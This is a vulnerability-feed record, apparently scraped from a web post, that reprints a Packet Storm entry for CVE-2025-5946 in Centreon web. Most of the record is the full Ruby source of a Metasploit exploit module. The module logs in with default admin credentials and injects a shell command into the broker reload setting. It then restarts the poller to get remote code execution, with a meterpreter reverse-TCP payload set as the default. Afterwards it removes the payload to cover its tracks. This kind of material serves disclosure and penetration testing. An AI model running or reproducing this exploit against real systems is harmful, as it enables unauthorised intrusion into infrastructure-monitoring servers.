{“lastseen”:”2025-11-05T16:51:17″,”description”:”Centreon is a platform designed to monitor your cloud and on-premises infrastructure….”,”published”:”2025-11-05T00:00:00″,”modified”:”2025-11-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Centreon Broker Engine Reload Parameter Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211222″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-5946″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Centreon authenticated command injection leading to RCE via broker engine \\”reload\\” parameter’,\\n ‘Description’ =\\u003e %q{\\n Centreon is a platform designed to monitor your cloud and on-premises infrastructure.\\n This module exploits an command injection vulnerability using the `broker engine reload` setting\\n on the poller configuration page of the Centreon web application. Injecting a malcious payload\\n at the `broker engine reload` parameter and restarting the poller triggers this vulnerability.\\n You need have admin access at the Centreon Web application in order to execute this RCE.\\n This issue affects all Centreon editions \\u003e= `19.10.0` and it is fixed in Centreon Web versions\\n `24.10.13`, `24.04.18` and `23.10.28`.\\n },\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’ # Discovery, Metasploit module \\u0026 default password weakness\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-5946’],\\n [‘URL’, ‘https:\/\/thewatch.centreon.com\/latest-security-bulletins-64\/cve-2025-5946-centreon-web-all-versions-high-severity-5104’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/23D4cUoBZj\/cve-2025-5946’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Privileged’ =\\u003e false,\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp’\\n },\\n ‘Payload’ =\\u003e {\\n ‘Encoder’ =\\u003e ‘cmd\/base64’,\\n ‘BadChars’ =\\u003e \\”\\\\x20\\\\x3E\\\\x26\\\\x27\\\\x22\\” # no space \\u003e \\u0026 ‘ \\”\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-09-24’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true,\\n ‘RPORT’ =\\u003e 443\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Path to the Centreon application’, ‘\/centreon’]),\\n OptString.new(‘USERNAME’, [true, ‘Centreon web admin user’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Centreon web admin password’, ‘Centreon!123’])\\n ])\\n end\\n \\n # login at the Centreon web application\\n # return true if login successful else false\\n def centreon_login(name, pwd)\\n # login with admin credentials\\n # first try login logic in newer versions\\n post_data = {\\n login: name.to_s,\\n password: pwd.to_s\\n }.to_json\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘latest’, ‘authentication’, ‘providers’, ‘configurations’, ‘local’),\\n ‘data’ =\\u003e post_data.to_s\\n })\\n return true if res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘redirect_uri’)\\n \\n # try again using login logic for older versions\\n # get centreon_token\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘keep_cookies’ =\\u003e true\\n })\\n \\n # find the token: \\u003cinput name=\\”centreon_token\\” type=\\”hidden\\” value=\\”988067bfac1fdbb52566cb06bef5b514\\” \/\\u003e\\n if res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘centreon_token’)\\n centreon_token_match = res.body.match(%r{\\u003cinput name=\\”centreon_token\\”.*\/\\u003e})\\n centreon_token = centreon_token_match[0].split(‘value=\\”‘)[1].gsub(%r{\\”.*\/\\u003e}, ”) unless centreon_token_match.nil?\\n else\\n vprint_status(‘No centreon_token found!’)\\n return false\\n end\\n \\n # login with admin credentials and centreon_token\\n if centreon_token\\n vprint_status(\\”centreon_token=#{centreon_token}\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘useralias’ =\\u003e name.to_s,\\n ‘password’ =\\u003e pwd.to_s,\\n ‘submitLogin’ =\\u003e ‘Connect’,\\n ‘centreon_token’ =\\u003e centreon_token.to_s\\n }\\n })\\n return true if res\\u0026.code == 302\\n else\\n vprint_warning(‘Unable to process the centreon_token.’)\\n end\\n false\\n end\\n \\n # CVE-2025-5946: Command Injection leading to RCE via the centreon broker engine \\”reload\\” parameter triggered by a poller reload\\n def execute_payload(cmd, _opts = {})\\n @clean_payload = true\\n payload = \\”;#{cmd}\\”\\n vprint_status(\\”payload=#{payload}\\”)\\n # attach payload at the centreon broker engine \\”reload parameter\\n fail_with(Failure::PayloadFailed, ‘Dropping the payload at the target failed.’) unless drop_rce_payload(payload)\\n \\n # trigger execution by restarting the poller\\n send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘include’, ‘configuration’, ‘configGenerate’, ‘xml’, ‘restartPollers.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘poller’ =\\u003e 1,\\n ‘mode’ =\\u003e 1\\n }\\n })\\n end\\n \\n # attach payload at the centreon broker engine \\”reload\\” parameter and commit into the sql database\\n def drop_rce_payload(payload)\\n # get the poller configuration and centreon_token\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘main.get.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_get’ =\\u003e {\\n ‘p’ =\\u003e 60901,\\n ‘o’ =\\u003e ‘c’,\\n ‘server_id’ =\\u003e 1\\n }\\n })\\n \\n # find the token: \\u003cinput name=\\”centreon_token\\” type=\\”hidden\\” value=\\”988067bfac1fdbb52566cb06bef5b514\\” \/\\u003e\\n if res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘centreon_token’)\\n centreon_token_match = res.body.match(%r{\\u003cinput name=\\”centreon_token\\”.*\/\\u003e})\\n centreon_token = centreon_token_match[0].split(‘value=\\”‘)[1].gsub(%r{\\”.*\/\\u003e}, ”) unless centreon_token_match.nil?\\n else\\n vprint_status(‘No centreon_token found!’)\\n return false\\n end\\n \\n # update poller \\”centreon broker engine reload\\” setting with payload\\n if centreon_token\\n vprint_status(\\”centreon_token=#{centreon_token}\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘main.get.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_get’ =\\u003e {\\n ‘p’ =\\u003e 60901\\n },\\n ‘vars_post’ =\\u003e {\\n ‘name’ =\\u003e ‘Central’,\\n ‘ns_ip_address’ =\\u003e ‘127.0.0.1’,\\n ‘localhost[localhost]’ =\\u003e 1,\\n ‘is_default[is_default]’ =\\u003e 1,\\n ‘gorgone_communication_type[gorgone_communication_type]’ =\\u003e 1,\\n ‘gorgone_port’ =\\u003e 5556,\\n ‘engine_start_command’ =\\u003e ‘service centengine start’,\\n ‘engine_stop_command’ =\\u003e ‘service centengine stop’,\\n ‘engine_restart_command’ =\\u003e ‘service centengine restart’,\\n ‘engine_reload_command’ =\\u003e ‘service centengine reload’,\\n ‘nagios_bin’ =\\u003e ‘\/usr\/sbin\/centengine’,\\n ‘nagiostats_bin’ =\\u003e ‘\/usr\/sbin\/centenginestats’,\\n ‘nagios_perfdata’ =\\u003e ‘\/var\/log\/centreon-engine\/service-perfdata’,\\n ‘broker_reload_command’ =\\u003e \\”service cbd reload#{payload}\\”,\\n ‘centreonbroker_cfg_path’ =\\u003e ‘\/etc\/centreon-broker’,\\n ‘centreonbroker_module_path’ =\\u003e ‘\/usr\/share\/centreon\/lib\/centreon-broker’,\\n ‘centreonbroker_logs_path’ =\\u003e nil,\\n ‘centreonconnector_path’ =\\u003e ‘\/usr\/lib64\/centreon-connector’,\\n ‘init_script_centreontrapd’ =\\u003e ‘centreontrapd’,\\n ‘snmp_trapd_path_conf’ =\\u003e ‘\/etc\/snmp\/centreon_traps\/’,\\n ‘ns_activate[ns_activate]’ =\\u003e 1,\\n ‘submitC’ =\\u003e ‘Save’,\\n ‘id’ =\\u003e 1,\\n ‘o’ =\\u003e ‘c’,\\n ‘centreon_token’ =\\u003e centreon_token.to_s\\n }\\n })\\n if res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘ajaxOption table’)\\n vprint_good(‘Poller setting \\”broker_reload_command\\” updated with payload.’)\\n return true\\n end\\n vprint_warning(‘Poller setting \\”broker_reload_command\\” is not updated with payload.’)\\n else\\n vprint_warning(‘Unable to process the centreon_token.’)\\n end\\n return false\\n end\\n \\n # try to remove the payload from the poller settings to cover our tracks\\n def cleanup\\n super\\n # check if payload should be cleaned\\n if @clean_payload\\n vprint_status(‘Cleaning up the mess…’)\\n if drop_rce_payload(nil)\\n print_good(‘Payload has been successfully removed from the poller setting \\”broker_reload_command\\”.’)\\n else\\n print_warning(‘Payload not removed. Try to remove it manually from the poller setting \\”broker_reload_command\\”.’)\\n end\\n end\\n end\\n \\n # get the Centreon version\\n # return version if successful else nil\\n def get_centreon_version\\n # get version information use Web API v2.0\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘latest’, ‘platform’, ‘versions’),\\n ‘keep_cookies’ =\\u003e true\\n })\\n # for older versions try to scrape the version from the login web page\\n unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘web’)\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘keep_cookies’ =\\u003e true\\n })\\n return nil unless res\\u0026.code == 200\\n \\n build = res.body.match(\/v\\\\.\\\\s*\\\\d+\\\\.\\\\d+\\\\.\\\\d+\/)\\n return nil if build.nil?\\n \\n return build[0].gsub(\/[[:space:]]\/, ”).split(‘v.’)[1]\\n end\\n res_json = res.get_json_document\\n res_json[‘web’][‘version’] unless res_json.blank?\\n end\\n \\n def check\\n version = get_centreon_version\\n return CheckCode::Unknown(‘Can not determine the Centreon version.’) if version.nil?\\n \\n case version.scan(\/^\\\\d+\\\\.\\\\d+\/)[0]\\n when ‘24.10’\\n return CheckCode::Appears(\\”Centreon version #{version}\\”) if Rex::Version.new(version) \\u003c Rex::Version.new(‘24.10.13’)\\n when ‘24.04’\\n return CheckCode::Appears(\\”Centreon version #{version}\\”) if Rex::Version.new(version) \\u003c Rex::Version.new(‘24.04.18’)\\n when ‘23.10’\\n return CheckCode::Appears(\\”Centreon version #{version}\\”) if Rex::Version.new(version) \\u003c Rex::Version.new(‘23.10.28’)\\n else\\n return CheckCode::Appears(\\”Centreon version #{version}\\”) if Rex::Version.new(version) \\u003e= Rex::Version.new(‘19.10.0’)\\n end\\n \\n CheckCode::Safe(\\”Centreon version #{version}\\”)\\n end\\n \\n def exploit\\n # check if we can login at the Centreon Web application with the default admin credentials\\n username = datastore[‘USERNAME’]\\n password = datastore[‘PASSWORD’]\\n print_status(\\”Trying to log in with admin credentials #{username}:#{password} at the Centreon Web application.\\”)\\n fail_with(Failure::NoAccess, ‘Failed to authenticate at the Centreon Web application.’) unless centreon_login(username, password)\\n print_status(‘Succesfully authenticated at the Centreon Web application.’)\\n \\n # storing credentials at the msf database\\n print_status(‘Saving admin credentials at the msf database.’)\\n store_valid_credential(user: username, private: password)\\n \\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n execute_payload(payload.encoded)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211222″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211222\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-05T16:51:17″,”description”:”Centreon is a platform designed to monitor your cloud and on-premises infrastructure….”,”published”:”2025-11-05T00:00:00″,”modified”:”2025-11-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Centreon Broker Engine Reload Parameter Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211222″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-5946″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-24902","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n